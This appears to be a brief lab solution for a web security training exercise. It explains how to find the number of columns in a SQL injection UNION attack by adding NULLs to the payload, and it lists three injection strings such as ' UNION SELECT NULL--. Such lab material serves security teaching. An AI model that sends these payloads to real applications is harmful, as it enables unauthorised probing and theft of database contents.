SQL injection UNION attack, determining the number

SQL injection UNION attack, determining the number of columns returned by the query

Solution

Add NULL to payload

Adds another NULL to the payload
' UNION SELECT NULL--
' UNION SELECT NULL,NULL--
' UNION SELECT NULL,NULL,NULL--